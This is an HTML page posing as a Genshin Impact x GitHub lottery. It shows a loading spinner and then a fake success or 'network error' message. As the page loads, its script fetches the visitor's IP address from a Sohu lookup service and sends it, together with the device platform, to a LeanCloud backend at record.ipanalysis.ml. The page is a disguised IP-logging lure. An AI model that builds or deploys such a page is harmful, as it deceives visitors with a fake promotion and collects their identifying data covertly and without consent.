<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>原神 x GitHub合作城市</title>
  <style type="text/css">
.loadEffect {
            width: 100px;
            height: 100px;
            margin: 0 auto;
            margin-top:100px;
            position: relative;
        }
        .loadEffect div{
            width: 100%;
            height: 100%;
            position: absolute;
            -webkit-animation: load 2.08s linear infinite;
        }
        .loadEffect div span{
            display: inline-block;
            width: 20px;
            height: 20px;
            border-radius: 50%;
            background: lightgreen;
            position: absolute;
            left: 50%;
            margin-top: -10px;
            margin-left: -10px;
        }
        @-webkit-keyframes load{
            0%{
                -webkit-transform: rotate(0deg);
            }
            10%{
                -webkit-transform: rotate(45deg);
            }
            50%{
                opacity: 1;
                -webkit-transform: rotate(160deg);
            }
            62%{
                opacity: 0;
            }
            65%{
                opacity: 0;
                -webkit-transform: rotate(200deg);
            }
            90%{
                -webkit-transform: rotate(340deg);
            }
            100%{
                -webkit-transform: rotate(360deg);
            }

        }
        .loadEffect div:nth-child(1){
            -webkit-animation-delay:0.2s;
        }
        .loadEffect div:nth-child(2){
            -webkit-animation-delay:0.4s;
        }
        .loadEffect div:nth-child(3){
            -webkit-animation-delay:0.6s;
        }
        .loadEffect div:nth-child(4){
            -webkit-animation-delay:0.8s;
        }
  </style>
</head>
<body>
<div class="loadEffect">
  <div><span></span></div>
  <div><span></span></div>
  <div><span></span></div>
  <div><span></span></div>
</div>
<p id='fake_info' style='width: 100%;text-align: center'>正在获取抽奖信息...</p>
<script src="https://cdn.jsdelivr.net/npm/leancloud-storage@4.6.1/dist/av-min.js"></script>

<script src="https://pv.sohu.com/cityjson?ie=utf-8"></script>  
<script type="text/javascript">
var ip_address = returnCitySN["cip"]
console.log("User IP: " + ip_address)

AV.init({
  appId: "HM4bm3BiUQyLmcpDxB4EAxvI-MdYXbMMI",
  appKey: "JA5RS0EdPyubOZBtTp4apDJB",
  serverURL: "https://record.ipanalysis.ml"
});

var IP = AV.Object.extend('IPs');
var ipObject = new IP();
ipObject.set('ip_address', ip_address);
ipObject.set('device_info', navigator.platform);
ipObject.save().then((ipObject) => {
  console.log('Success!');
  setTimeout(function () {
    var ring = document.querySelector(".loadEffect");
    ring.style.display = "none";
    if (window.location.href.toString().includes('code=')) {
      document.getElementById('fake_info').innerHTML = "助力成功！🎉";
    } else {
      document.getElementById('fake_info').innerHTML = "网络错误，请使用 Wi-Fi 重试。";
    }
  }, 2000);
})
</script>
</body>

</html>